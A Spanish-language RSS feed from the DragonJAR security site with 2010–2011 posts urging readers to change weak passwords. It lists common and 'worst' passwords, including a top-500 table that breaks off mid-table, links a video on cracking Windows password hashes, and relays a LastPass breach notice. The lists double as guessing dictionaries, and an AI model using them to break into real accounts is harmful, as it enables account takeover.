<?xml version="1.0" encoding="UTF-8"?> <rss
version="2.0"
xmlns:content="http://purl.org/rss/1.0/modules/content/"
xmlns:wfw="http://wellformedweb.org/CommentAPI/"
xmlns:dc="http://purl.org/dc/elements/1.1/"
xmlns:atom="http://www.w3.org/2005/Atom"
xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
><channel><title>La Comunidad DragonJAR &#187; Contraseñas</title> <atom:link href="http://www.dragonjar.org/tag/contrasenas/feed" rel="self" type="application/rss+xml" /><link>http://www.dragonjar.org</link> <description>Noticias de actualidad y seguridad informática, herramientas de seguridad, documentación y una excelente COMUNIDAD.</description> <lastBuildDate>Sat, 11 Feb 2012 22:13:24 +0000</lastBuildDate> <language>en</language> <sy:updatePeriod>hourly</sy:updatePeriod> <sy:updateFrequency>1</sy:updateFrequency> <generator>http://wordpress.org/?v=3.3.1</generator> <item><title>Las peores contraseñas de este año</title><link>http://www.dragonjar.org/las-peores-contrasenas-de-este-ano.xhtml</link> <comments>http://www.dragonjar.org/las-peores-contrasenas-de-este-ano.xhtml#comments</comments> <pubDate>Sat, 19 Nov 2011 17:07:19 +0000</pubDate> <dc:creator>DragoN</dc:creator> <category><![CDATA[Documentacion]]></category> <category><![CDATA[Claves]]></category> <category><![CDATA[Contraseñas]]></category> <category><![CDATA[Las peores contraseñas de este año]]></category> <category><![CDATA[peores passwords]]></category><guid
isPermaLink="false">http://www.dragonjar.org/?p=8142</guid> <description><![CDATA[Después de traerte las peores 500 contraseñas de todos los tiempos, las peores contraseñas en español y las peores contraseñas para dispositivos iOS ahora te traigo las peores contraseñas de este año, como puedes ver es muy poco lo que ha cambiado este listado en los últimos años, por lo que se mantiene la mala [...]]]></description> <content:encoded><![CDATA[<p
style="float:right; margin:0 0 10px 15px; width:240px;"> <img
src="http://www.dragonjar.org/wp-content/uploads/2011/11/Password.jpg" width="240" title="Las peores contraseñas de este año" alt="Password Las peores contraseñas de este año" /></p><p>Después de traerte <a
href="http://www.dragonjar.org/malas-contrasenas-para-utilizar.xhtml">las peores 500 contraseñas de todos los tiempos</a>,<a
href="http://www.dragonjar.org/los-peores-passwords-en-espanol.xhtml"> las peores contraseñas en español</a> y <a
href="http://www.dragonjar.org/las-peores-contrasenas-para-el-iphone-ipod-o-ipad.xhtml">las peores contraseñas para dispositivos iOS</a> ahora te traigo las <a
href="http://www.dragonjar.org/tag/peores" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con peores">peores</a> <a
href="http://www.dragonjar.org/tag/contrasenas" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Contraseñas">contraseñas</a> de este año, como puedes ver es muy poco lo que ha cambiado este listado en los últimos años, por lo que se mantiene la mala costumbre de utilizar estas <a
href="http://www.dragonjar.org/tag/contrasenas" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Contraseñas">contraseñas</a> en la mayoría de personas.<br
/> <span
id="more-8142"></span><br
/> Te dejo el listado de <a
href="http://www.dragonjar.org/tag/passwords" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Passwords">passwords</a>, no sin antes recomendarte seguir los enlaces de artículos y herramientas aprender a utilizar contraseñas seguras, que te dejo después de ella:</p><ol><li>password</li><li>123456</li><li>12345678</li><li>qwerty</li><li>abc123</li><li>monkey</li><li>1234567</li><li>letmein</li><li>trustno1</li><li>dragon</li><li>baseball</li><li>111111</li><li>iloveyou</li><li>master</li><li>sunshine</li><li>ashley</li><li>bailey</li><li>passw0rd</li><li>shadow</li><li>123123</li><li>654321</li><li>superman</li><li>qazwsx</li><li>michael</li><li>football</li></ol><p>Si tu contraseña se encuentra en esta lista, por favor, cámbiala inmediatamente, en la comunidad dragonjar hemos proporcionado siempre información útil para <a
title="Maneja tus Contraseñas de Forma Sencilla" href="../maneja-tus-contrasenas-de-forma-sencilla.xhtml" rel="nofollow" target="_blank">maneja tus contraseñas fácilmente</a>, <a
title="herramientas" href="../tag/herramientas" rel="nofollow" target="_blank">herramientas</a> para <a
title="Enlace permanente a PassPub, Generador de Contraseñas Seguras" href="../passpub-generador-de-contrasenas-seguras.xhtml" rel="bookmark">generar contraseñas seguras</a>, para testear la <a
href="http://www.dragonjar.org/tag/seguridad" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Seguridad">seguridad</a> de tu contraseña <a
href="https://www.microsoft.com/security/pc-security/password-checker.aspx" rel="nofollow" target="_blank">como esta herramienta online de Microsoft</a> o<a
href="http://password.es/comprobador/" rel="nofollow" target="_blank"> la de password.es</a> que incluye un <a
href="http://password.es/" rel="nofollow" target="_blank">generador de contraseñas seguras</a> e incluso <a
title="aplicaciones" href="../tag/aplicaciones">aplicaciones</a> que si no quieres utilizar una <a
title="palabra clave" href="../tag/palabra-clave">palabra clave</a>, te permiten <a
href="../proteccion-biometrica-al-alcance-de-todos.xhtml">utilizar tu rostro como contraseña</a>.</p><h3  class="related_post_title">También puede interesarte...</h3><ul
class="related_post"><li><a
href="http://www.dragonjar.org/los-peores-passwords-en-espanol.xhtml" title="Las peores Contraseñas en Español">Las peores Contraseñas en Español</a></li><li><a
href="http://www.dragonjar.org/como-funcionan-y-se-crackean-las-claves-en-sistemas-windows.xhtml" title="Cómo funcionan y se crackean las claves en sistemas Windows">Cómo funcionan y se crackean las claves en sistemas Windows</a></li><li><a
href="http://www.dragonjar.org/cambia-tu-clave-maestra-en-lastpass.xhtml" title="Cambia tu clave maestra en LastPass">Cambia tu clave maestra en LastPass</a></li><li><a
href="http://www.dragonjar.org/malas-contrasenas-para-utilizar.xhtml" title="Las Peores 500 Contraseñas de Todos los Tiempos">Las Peores 500 Contraseñas de Todos los Tiempos</a></li><li><a
href="http://www.dragonjar.org/1234-y-password-son-las-contrasenas-utilizadas-en-usa.xhtml" title="&#8220;1234&#8243; y &#8220;password&#8221; son las Contraseñas + Utilizadas en USA">&#8220;1234&#8243; y &#8220;password&#8221; son las Contraseñas + Utilizadas en USA</a></li><li><a
href="http://www.dragonjar.org/hydra-revive.xhtml" title="Hydra Revive!!">Hydra Revive!!</a></li><li><a
href="http://www.dragonjar.org/geelbe-crackeado-%c2%a1cambia-tus-claves-ya.xhtml" title="Geelbe crackeado ¡Cambia tus Claves YA!">Geelbe crackeado ¡Cambia tus Claves YA!</a></li><li><a
href="http://www.dragonjar.org/robando-claves-por-xss-del-administrador-de-contrasenas-del-firefox.xhtml" title="Robando claves por XSS del Administrador de Contraseñas del Firefox">Robando claves por XSS del Administrador de Contraseñas del Firefox</a></li></ul>]]></content:encoded> <wfw:commentRss>http://www.dragonjar.org/las-peores-contrasenas-de-este-ano.xhtml/feed</wfw:commentRss> <slash:comments>9</slash:comments> </item> <item><title>Las peores Contraseñas en Español</title><link>http://www.dragonjar.org/los-peores-passwords-en-espanol.xhtml</link> <comments>http://www.dragonjar.org/los-peores-passwords-en-espanol.xhtml#comments</comments> <pubDate>Sun, 15 May 2011 15:04:29 +0000</pubDate> <dc:creator>DragoN</dc:creator> <category><![CDATA[Noticias Seguridad]]></category> <category><![CDATA[Clave]]></category> <category><![CDATA[Claves]]></category> <category><![CDATA[Contraseñas]]></category> <category><![CDATA[Español]]></category> <category><![CDATA[Password]]></category> <category><![CDATA[Passwords]]></category> <category><![CDATA[peores]]></category> <category><![CDATA[Segura]]></category> <category><![CDATA[Spanish]]></category> <category><![CDATA[usuario contraseña]]></category><guid
isPermaLink="false">http://www.dragonjar.org/?p=6237</guid> <description><![CDATA[Las personas en su afán de hacer mas cómoda su navegación por Internet, tienden a utilizar contraseñas fáciles de recordar y utilizan la misma para los sitios que mas frecuentan; Este comportamiento es tan común que sin saberlo muchas personas utilizan la misma combinación de letras y números como su contraseña, varios factores influyen en [...]]]></description> <content:encoded><![CDATA[<p
style="float:right; margin:0 0 10px 15px; width:240px;"> <img
src="http://www.dragonjar.org/wp-content/uploads/2011/05/Peores-Passwords-Spanish.jpg" width="240" title="Las peores Contraseñas en Español" alt="Peores Passwords Spanish Las peores Contraseñas en Español" /></p><p>Las personas en su afán de hacer mas cómoda su navegación por Internet, tienden a utilizar contraseñas fáciles de recordar y utilizan la misma para los sitios que mas frecuentan; Este comportamiento es tan común que sin saberlo muchas personas utilizan la misma combinación de letras y números como su contraseña, varios factores influyen en esto, como lo son la disposición del teclado, el uso de nombres comunes, hobbies, etc&#8230;</p><p
style="text-align: center;"><img
title="Peores Passwords en Español" src="../wp-content/uploads/2011/05/Peores-Passwords-Spanish.jpg" alt="Peores Passwords Spanish Las peores Contraseñas en Español" width="400" height="300" /></p><p>A continuación les dejo una lista de las contraseñas mas utilizadas en español, si tu contraseña se encuentra en esta lista, por  favor, cámbiala de inmediato, en la comunidad hemos proporcionado  siempre información útil para <a
title="Maneja tus Contraseñas de Forma Sencilla" rel="nofollow" href="../maneja-tus-contrasenas-de-forma-sencilla.xhtml" target="_blank">maneja tus contraseñas fácilmente</a>, <a
title="herramientas" rel="nofollow" href="../tag/herramientas" target="_blank">herramientas</a> para <a
title="Enlace permanente a PassPub, Generador de Contraseñas Seguras" rel="bookmark" href="../passpub-generador-de-contrasenas-seguras.xhtml">generar   contraseñas seguras</a>, e incluso <a
title="aplicaciones" href="../tag/aplicaciones">aplicaciones</a> que si no quieres utilizar una <a
title="palabra clave" href="../tag/palabra-clave">palabra clave</a>, te permiten <a
href="../proteccion-biometrica-al-alcance-de-todos.xhtml">utilizar tu rostro como contraseña</a>.<span
id="more-6237"></span></p><ul><li><strong>123456</strong></li><li><strong>12345</strong></li><li><strong>123456789</strong></li><li><strong>12345678</strong></li><li><strong>1234567</strong></li><li><strong>111111</strong></li><li><strong>Nombres Propios</strong> <em>(alejandra, alberto, alejandro, roberto, etc..)</em></li><li><strong>Contraseña</strong></li><li><strong>Tequiero</strong></li><li><strong>Típicos desde los 80&#8242;s</strong> <em>(sexo,amor,dios,dinero, muchas veces se combinan con números para cumplir el mínimo de caracteres exigido)</em></li><li><strong>Nombre de la Pagina</strong> <em>(si la clave es de facebook, la clave será facebook, lo mismo con gmail, hotmail, etc&#8230;)</em></li><li><strong>qwerty</strong></li><li><strong>000000</strong></li><li><strong>Hobby</strong> <em>(equipos de fútbol, artistas o grupos musicales, nombres de actores o películas, etc&#8230;)</em></li><li><strong>Cédula o números <a
href="http://www.dragonjar.org/tag/celular" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Celular">celular</a></strong> <em>(son muy utilizados y dan sensación de <a
href="http://www.dragonjar.org/tag/seguridad" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Seguridad">seguridad</a>, pero esta información se puede conseguir fácilmente)</em></li><li><strong>abc123</strong></li><li><strong>tequiero</strong></li><li><strong>estrella</strong></li><li><strong>iloveyou</strong></li><li><strong>654321</strong></li><li><strong>bonita</strong></li><li><strong>mariposa</strong></li><li><strong>america</strong></li></ul><p>Para complementar esta lista, <a
href="http://www.dragonjar.org/malas-contrasenas-para-utilizar.xhtml">puedes ver los peores passwords de todos los tiempos</a> y seguir las recomendaciones de seguridad que te enlazamos al principio, también puedes testear la seguridad de tu contraseña <a
href="https://www.microsoft.com/security/pc-security/password-checker.aspx">con esta herramienta online de Microsoft</a> o<a
href="http://password.es/comprobador/"> la de password.es</a> que incluye un <a
href="http://password.es/">generador de contraseñas seguras.</a></p><h3  class="related_post_title">También puede interesarte...</h3><ul
class="related_post"><li><a
href="http://www.dragonjar.org/malas-contrasenas-para-utilizar.xhtml" title="Las Peores 500 Contraseñas de Todos los Tiempos">Las Peores 500 Contraseñas de Todos los Tiempos</a></li><li><a
href="http://www.dragonjar.org/cambia-tu-clave-maestra-en-lastpass.xhtml" title="Cambia tu clave maestra en LastPass">Cambia tu clave maestra en LastPass</a></li><li><a
href="http://www.dragonjar.org/1234-y-password-son-las-contrasenas-utilizadas-en-usa.xhtml" title="&#8220;1234&#8243; y &#8220;password&#8221; son las Contraseñas + Utilizadas en USA">&#8220;1234&#8243; y &#8220;password&#8221; son las Contraseñas + Utilizadas en USA</a></li><li><a
href="http://www.dragonjar.org/robando-claves-por-xss-del-administrador-de-contrasenas-del-firefox.xhtml" title="Robando claves por XSS del Administrador de Contraseñas del Firefox">Robando claves por XSS del Administrador de Contraseñas del Firefox</a></li><li><a
href="http://www.dragonjar.org/como-recuperar-clave-mysql.xhtml" title="Como Recuperar Clave MySQL">Como Recuperar Clave MySQL</a></li><li><a
href="http://www.dragonjar.org/diccionarios-para-realizar-ataques-de-fuerza-bruta.xhtml" title="Diccionario claves WPA para Realizar Ataques de Fuerza Bruta">Diccionario claves WPA para Realizar Ataques de Fuerza Bruta</a></li><li><a
href="http://www.dragonjar.org/como-funcionan-y-se-crackean-las-claves-en-sistemas-windows.xhtml" title="Cómo funcionan y se crackean las claves en sistemas Windows">Cómo funcionan y se crackean las claves en sistemas Windows</a></li><li><a
href="http://www.dragonjar.org/diccionarios-con-passwords-de-sitios-expuestos.xhtml" title="Diccionarios con Passwords de Sitios Expuestos">Diccionarios con Passwords de Sitios Expuestos</a></li></ul>]]></content:encoded> <wfw:commentRss>http://www.dragonjar.org/los-peores-passwords-en-espanol.xhtml/feed</wfw:commentRss> <slash:comments>12</slash:comments> </item> <item><title>Cómo funcionan y se crackean las claves en sistemas Windows</title><link>http://www.dragonjar.org/como-funcionan-y-se-crackean-las-claves-en-sistemas-windows.xhtml</link> <comments>http://www.dragonjar.org/como-funcionan-y-se-crackean-las-claves-en-sistemas-windows.xhtml#comments</comments> <pubDate>Sat, 14 May 2011 00:24:38 +0000</pubDate> <dc:creator>DragoN</dc:creator> <category><![CDATA[Noticias Seguridad]]></category> <category><![CDATA[Claves]]></category> <category><![CDATA[Contraseñas]]></category> <category><![CDATA[Crackean]]></category> <category><![CDATA[Funcionan]]></category> <category><![CDATA[Microsoft]]></category> <category><![CDATA[Passwords]]></category> <category><![CDATA[rainbow tables]]></category> <category><![CDATA[Windows]]></category><guid
isPermaLink="false">http://www.dragonjar.org/?p=6343</guid> <description><![CDATA[Las contraseñas han sido por muchos años la medida de seguridad por excelencia para garantizar el acceso a las personas autorizadas de un sistema, pero no todas las implementaciones en los sistemas de acceso son realizadas correctamente, es el caso de los sistemas Microsoft Windows que en su afán de conservar la compatibilidad con versiones [...]]]></description> <content:encoded><![CDATA[<p
style="float:right; margin:0 0 10px 15px; width:240px;"> <img
src="http://www.dragonjar.org/wp-content/uploads/2011/05/Seguridad-Windows-7-300x214.jpg" width="240" title="Cómo funcionan y se crackean las claves en sistemas Windows" alt="Seguridad Windows 7 300x214 Cómo funcionan y se crackean las claves en sistemas Windows" /></p><p>Las <a
href="http://www.dragonjar.org/tag/contrasenas" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Contraseñas">contraseñas</a> han sido por muchos años la medida de <a
href="http://www.dragonjar.org/tag/seguridad" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Seguridad">seguridad</a> por excelencia para garantizar el acceso a las personas autorizadas de un sistema, pero no todas las implementaciones en los sistemas de acceso son realizadas correctamente, es el caso de los sistemas <a
href="http://www.dragonjar.org/tag/microsoft" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Microsoft">Microsoft</a> <a
href="http://www.dragonjar.org/tag/windows" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Windows">Windows</a> que en su afán de conservar la compatibilidad con versiones anteriores, permiten la utilización de cifrados inseguros para las <a
href="http://www.dragonjar.org/tag/claves" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Claves">claves</a> que utilizamos en sistemas mas actuales.</p><p
style="text-align: center;"><img
title="Seguridad-Windows-7" src="../wp-content/uploads/2011/05/Seguridad-Windows-7.jpg" alt="Seguridad Windows 7 Cómo funcionan y se crackean las claves en sistemas Windows" width="430" height="307" /></p><p>El siguiente vídeo que me envía Omar Palomino, nos enseña claramente como funciona el sistema de contraseñas en Microsoft Windows, por qué no debemos usar contraseñas con menos de 14 caracteres y veremos varios métodos para crackear el sistema de claves en entornos Windows incluyendo el uso de <a
href="http://www.dragonjar.org/tag/rainbow-tables" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con rainbow tables">Rainbow Tables</a>.<span
id="more-6343"></span></p><p
style="text-align: center;"><iframe
src="http://player.vimeo.com/video/24040958?title=0&amp;byline=0&amp;portrait=0" width="580" height="435" frameborder="0"></iframe></p><p><strong>Mas Información:</strong><a
title="Permanent Link to A la fuerza…. por fuerza bruta!!" rel="bookmark" href="http://www.el-palomo.com/2011/05/a-la-fuerza-por-fuerza-bruta/"><br
/> A la fuerza…. por fuerza bruta!!</a></p><h3  class="related_post_title">También puede interesarte...</h3><ul
class="related_post"><li><a
href="http://www.dragonjar.org/los-peores-passwords-en-espanol.xhtml" title="Las peores Contraseñas en Español">Las peores Contraseñas en Español</a></li><li><a
href="http://www.dragonjar.org/cambia-tu-clave-maestra-en-lastpass.xhtml" title="Cambia tu clave maestra en LastPass">Cambia tu clave maestra en LastPass</a></li><li><a
href="http://www.dragonjar.org/nueva-versin-de-cain-abel.xhtml" title="Nueva versión de Cain &#038; Abel">Nueva versión de Cain &#038; Abel</a></li><li><a
href="http://www.dragonjar.org/ophcrack-con-soporte-para-windows-vista.xhtml" title="Ophcrack con soporte para Windows Vista ">Ophcrack con soporte para Windows Vista </a></li><li><a
href="http://www.dragonjar.org/bruter-herramienta-para-crackear-password-por-fuerza-bruta-de-forma-paralela-en-windows.xhtml" title="Bruter &#8211; Herramienta Para Crackear Password por Fuerza Bruta de Forma Paralela en Windows ">Bruter &#8211; Herramienta Para Crackear Password por Fuerza Bruta de Forma Paralela en Windows </a></li><li><a
href="http://www.dragonjar.org/las-peores-contrasenas-de-este-ano.xhtml" title="Las peores contraseñas de este año">Las peores contraseñas de este año</a></li><li><a
href="http://www.dragonjar.org/actualiza-tu-software-con-secunia-personal-software-inspector.xhtml" title="Actualiza tu software con Secunia Personal Software Inspector ">Actualiza tu software con Secunia Personal Software Inspector </a></li><li><a
href="http://www.dragonjar.org/malas-contrasenas-para-utilizar.xhtml" title="Las Peores 500 Contraseñas de Todos los Tiempos">Las Peores 500 Contraseñas de Todos los Tiempos</a></li></ul>]]></content:encoded> <wfw:commentRss>http://www.dragonjar.org/como-funcionan-y-se-crackean-las-claves-en-sistemas-windows.xhtml/feed</wfw:commentRss> <slash:comments>6</slash:comments> </item> <item><title>Cambia tu clave maestra en LastPass</title><link>http://www.dragonjar.org/cambia-tu-clave-maestra-en-lastpass.xhtml</link> <comments>http://www.dragonjar.org/cambia-tu-clave-maestra-en-lastpass.xhtml#comments</comments> <pubDate>Sat, 30 Apr 2011 16:46:50 +0000</pubDate> <dc:creator>DragoN</dc:creator> <category><![CDATA[Noticias Seguridad]]></category> <category><![CDATA[Clave]]></category> <category><![CDATA[Claves]]></category> <category><![CDATA[Contrasena]]></category> <category><![CDATA[Contraseñas]]></category> <category><![CDATA[lastpass]]></category> <category><![CDATA[Password]]></category> <category><![CDATA[Passwords]]></category><guid
isPermaLink="false">http://www.dragonjar.org/?p=6222</guid> <description><![CDATA[LastPass es uno de los mejores servicios para almacenar tus contraseñas en la nube y olvidarte de tener que recordar cada una de ellas, cuenta con multiples opciones que la diferencian de las demás alternativas, como su integración con multiples navegadores y dispositivos móviles, la posibilidad de utilizar claves desechables y la seguridad que nos ofrece su infraestructura. Pero esta seguridad ofrecida [...]]]></description> <content:encoded><![CDATA[<p
style="float:right; margin:0 0 10px 15px; width:240px;"> <img
src="http://www.dragonjar.org/wp-content/uploads/2011/05/LastPass.jpg" width="240" title="Cambia tu clave maestra en LastPass" alt="LastPass Cambia tu clave maestra en LastPass" /></p><p><a
href="http://www.dragonjar.org/tag/lastpass" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con lastpass">LastPass</a> es uno de los mejores servicios para almacenar tus <a
href="http://www.dragonjar.org/tag/contrasenas" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Contraseñas">contraseñas</a> en la nube y olvidarte de tener que recordar cada una de ellas, cuenta con multiples opciones que la diferencian de las demás alternativas, como su integración con multiples navegadores y dispositivos móviles, la posibilidad de utilizar <a
href="http://www.dragonjar.org/tag/claves" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Claves">claves</a> desechables y la <a
href="https://lastpass.com/whylastpass_technology.php">seguridad que nos ofrece su infraestructura</a>.</p><p
style="text-align: center;"><img
class="alignnone" title="Cambia tu clave en LastPass.com" src="http://www.dragonjar.org/wp-content/uploads/2011/05/LastPass.jpg" alt="LastPass Cambia tu clave maestra en LastPass" width="568" height="146" /></p><p>Pero esta <a
href="http://www.dragonjar.org/tag/seguridad" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Seguridad">seguridad</a> ofrecida se ha puesto en duda, después que <a
href="http://blog.lastpass.com/2011/05/lastpass-security-notification.html">desde su blog oficial anunciaran</a> la detección de una anomalia en el trafico de su base de datos, por lo que esperando lo peor, nos advierten de cambiar nuestra contraseña maestra cuanto antes.<span
id="more-6222"></span></p><p>En la fuga de información es posible que se filtraran los correos electrónicos y los hash de las claves, por tanto la seguridad de la información almacenada en tu cuenta depende, en gran medida de la <a
href="http://www.dragonjar.org/tag/clave" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Clave">clave</a> maestra que utilizaras para guardarla, si es una <a
href="http://www.dragonjar.org/tag/clave" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Clave">clave</a> que se encuentre facilmente en un diccionario, cambiala inmediatamente, si por el contrario utilizaste una <a
href="http://www.dragonjar.org/tag/clave" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Clave">clave</a> fuerte, puedes estar un poco mas tranquilo, pero igualmente es recomendable que cambies tu <a
href="http://www.dragonjar.org/tag/clave" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Clave">clave</a>.</p><p>Aunque la medida adoptada por LastPass es un poco paranoica, me parece bastante acertado que avisaran a sus clientes sobre esta anomalia, previniendo así un daño mayor a sus clientes si una fuga de información fué llevada a cabo.</p><p>PD. En estos momentos el cambio de contraseña esta bastante saturado, por la cantidad de personas que lo están realizando al mismo tiempo, si tu clave es debil, te recomiendo que insistas hasta que puedas cambiarla, de lo contrario puedes esperar un poco mas hasta que el servicio se normalice.</p><h2 style="text-align: center;"><a
href="http://www.lastpass.com">Visita LastPass.com</a></h2><p><strong>Mas Información:</strong><br
/> <a
href="http://blog.lastpass.com/2011/05/lastpass-security-notification.html">LastPass Security Notification</a></p><h3  class="related_post_title">También puede interesarte...</h3><ul
class="related_post"><li><a
href="http://www.dragonjar.org/los-peores-passwords-en-espanol.xhtml" title="Las peores Contraseñas en Español">Las peores Contraseñas en Español</a></li><li><a
href="http://www.dragonjar.org/robando-claves-por-xss-del-administrador-de-contrasenas-del-firefox.xhtml" title="Robando claves por XSS del Administrador de Contraseñas del Firefox">Robando claves por XSS del Administrador de Contraseñas del Firefox</a></li><li><a
href="http://www.dragonjar.org/malas-contrasenas-para-utilizar.xhtml" title="Las Peores 500 Contraseñas de Todos los Tiempos">Las Peores 500 Contraseñas de Todos los Tiempos</a></li><li><a
href="http://www.dragonjar.org/1234-y-password-son-las-contrasenas-utilizadas-en-usa.xhtml" title="&#8220;1234&#8243; y &#8220;password&#8221; son las Contraseñas + Utilizadas en USA">&#8220;1234&#8243; y &#8220;password&#8221; son las Contraseñas + Utilizadas en USA</a></li><li><a
href="http://www.dragonjar.org/clavehotmail-com-cometiendo-delitos-desde-el-2007.xhtml" title="ClaveHotmail.com cometiendo delitos desde el 2007">ClaveHotmail.com cometiendo delitos desde el 2007</a></li><li><a
href="http://www.dragonjar.org/diccionarios-para-realizar-ataques-de-fuerza-bruta.xhtml" title="Diccionario claves WPA para Realizar Ataques de Fuerza Bruta">Diccionario claves WPA para Realizar Ataques de Fuerza Bruta</a></li><li><a
href="http://www.dragonjar.org/como-funcionan-y-se-crackean-las-claves-en-sistemas-windows.xhtml" title="Cómo funcionan y se crackean las claves en sistemas Windows">Cómo funcionan y se crackean las claves en sistemas Windows</a></li><li><a
href="http://www.dragonjar.org/recupera-tu-password-de-filezilla.xhtml" title="Recupera tu Password de FileZilla">Recupera tu Password de FileZilla</a></li></ul>]]></content:encoded> <wfw:commentRss>http://www.dragonjar.org/cambia-tu-clave-maestra-en-lastpass.xhtml/feed</wfw:commentRss> <slash:comments>1</slash:comments> </item> <item><title>Las Peores 500 Contraseñas de Todos los Tiempos</title><link>http://www.dragonjar.org/malas-contrasenas-para-utilizar.xhtml</link> <comments>http://www.dragonjar.org/malas-contrasenas-para-utilizar.xhtml#comments</comments> <pubDate>Tue, 21 Dec 2010 23:17:42 +0000</pubDate> <dc:creator>DragoN</dc:creator> <category><![CDATA[Noticias Seguridad]]></category> <category><![CDATA[Clave]]></category> <category><![CDATA[Claves]]></category> <category><![CDATA[Contraseñas]]></category> <category><![CDATA[Password]]></category> <category><![CDATA[Segura]]></category> <category><![CDATA[usuario contraseña]]></category><guid
isPermaLink="false">http://www.dragonjar.org/?p=1825</guid> <description><![CDATA[Desde el momento en que la gente comenzó a utilizar contraseñas, no tardaron en darse cuenta que varias personas utilizaban la misma contraseña una y otra vez, incluso la forma en que las personas escriben erróneamente las palabras es coherente; Normalmente las personas son tan previsibles que la mayoría de los hackers hacen uso de [...]]]></description> <content:encoded><![CDATA[<p
style="float:right; margin:0 0 10px 15px; width:240px;"> <img
src="http://www.dragonjar.org/wp-content/uploads/2010/12/passwords.jpg" width="240" title="Las Peores 500 Contraseñas de Todos los Tiempos" alt="passwords Las Peores 500 Contraseñas de Todos los Tiempos" /></p><p>Desde el momento en que la gente comenzó a utilizar contraseñas, no tardaron en darse cuenta que varias personas utilizaban la misma contraseña una y otra vez, incluso la forma en que las personas escriben erróneamente  las palabras es coherente; Normalmente las personas son tan previsibles que la mayoría de los hackers hacen uso de listas de contraseñas comunes como las publicadas en este articulo.<span
id="more-1825"></span></p><p><strong>Actualizado:</strong><br
/> Recientemente la red de sitios Gawker Media, dueños de algunos de los portales de tecnología mas visitados en la red, como lifehacker o Gizmodo fueron vulnerados y su base de datos publicada en internet, junto con la información en texto plano de la información personal ingresada por sus usuarios, la siguiente tabla muestra una vez mas como el usuario promedio sigue usando las mismas <a
href="http://www.dragonjar.org/tag/claves" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Claves">claves</a> una y otra vez, aunque se les advierta que hacen parte de las <a
href="http://www.dragonjar.org/tag/peores" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con peores">peores</a> contraseñas de todos los tiempos.</p><p
style="text-align: center;"><img
src="http://www.dragonjar.org/wp-content/uploads/2010/12/Password.jpg" alt="Password Las Peores 500 Contraseñas de Todos los Tiempos"  title="Las Peores 500 Contraseñas de Todos los Tiempos" /><p>Para darle una idea de cómo los seres humanos son predecibles, la siguiente es una lista de las 500 contraseñas más comunes. Tenga en cuenta que cada contraseña que figuran aquí se ha utilizado por lo menos cientos si no miles de veces por otras personas.</p><p>&#8220;Aproximadamente uno de cada nueve personas por lo menos utiliza una contraseña en la lista, Y uno de cada 50 personas utiliza una de las 20 primeras peores contraseñas&#8221;.<br
/><center></p><table
border="1" width="415" align="center"><tbody><tr><td><strong>NO</strong></td><td><strong>Top 1-100</strong></td><td><strong>Top 101–200</strong></td><td><strong>Top 201–300</strong></td><td><strong>Top 301–400</strong></td><td><strong>Top 401–500</strong></td></tr><tr><td><strong>1</strong></td><td>123456</td><td>porsche</td><td>firebird</td><td>prince</td><td>rosebud</td></tr><tr><td><strong>2</strong></td><td><a
href="http://www.dragonjar.org/tag/password" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Password">password</a></td><td>guitar</td><td>butter</td><td>beach</td><td>jaguar</td></tr><tr><td><strong>3</strong></td><td>12345678</td><td>chelsea</td><td>united</td><td>amateur</td><td>great</td></tr><tr><td><strong>4</strong></td><td>1234</td><td>black</td><td>turtle</td><td>7777777</td><td>cool</td></tr><tr><td><strong>5</strong></td><td>pussy</td><td>diamond</td><td>steelers</td><td>muffin</td><td>cooper</td></tr><tr><td><strong>6</strong></td><td>12345</td><td>nascar</td><td>tiffany</td><td>redsox</td><td>1313</td></tr><tr><td><strong>7</strong></td><td>dragon</td><td>jackson</td><td>zxcvbn</td><td>star</td><td>scorpio</td></tr><tr><td><strong>8</strong></td><td>qwerty</td><td>cameron</td><td>tomcat</td><td>testing</td><td>mountain</td></tr><tr><td><strong>9</strong></td><td>696969</td><td>654321</td><td>golf</td><td>shannon</td><td>madison</td></tr><tr><td><strong>10</strong></td><td>mustang</td><td>computer</td><td>bond007</td><td>murphy</td><td>987654</td></tr><tr><td><strong>11</strong></td><td>letmein</td><td>amanda</td><td>bear</td><td>frank</td><td>brazil</td></tr><tr><td><strong>12</strong></td><td>baseball</td><td>wizard</td><td>tiger</td><td>hannah</td><td>lauren</td></tr><tr><td><strong>13</strong></td><td>master</td><td>xxxxxxxx</td><td>doctor</td><td>dave</td><td>japan</td></tr><tr><td><strong>14</strong></td><td>michael</td><td>money</td><td>gateway</td><td>eagle1</td><td>naked</td></tr><tr><td><strong>15</strong></td><td>football</td><td>phoenix</td><td>gators</td><td>11111</td><td>squirt</td></tr><tr><td><strong>16</strong></td><td>shadow</td><td>mickey</td><td>angel</td><td>mother</td><td>stars</td></tr><tr><td><strong>17</strong></td><td>monkey</td><td>bailey</td><td>junior</td><td>nathan</td><td>apple</td></tr><tr><td><strong>18</strong></td><td>abc123</td><td>knight</td><td>thx1138</td><td>raiders</td><td>alexis</td></tr><tr><td><strong>19</strong></td><td>pass</td><td>iceman</td><td>porno</td><td>steve</td><td>aaaa</td></tr><tr><td><strong>20</strong></td><td>fuckme</td><td>tigers</td><td>badboy</td><td>forever</td><td>bonnie</td></tr><t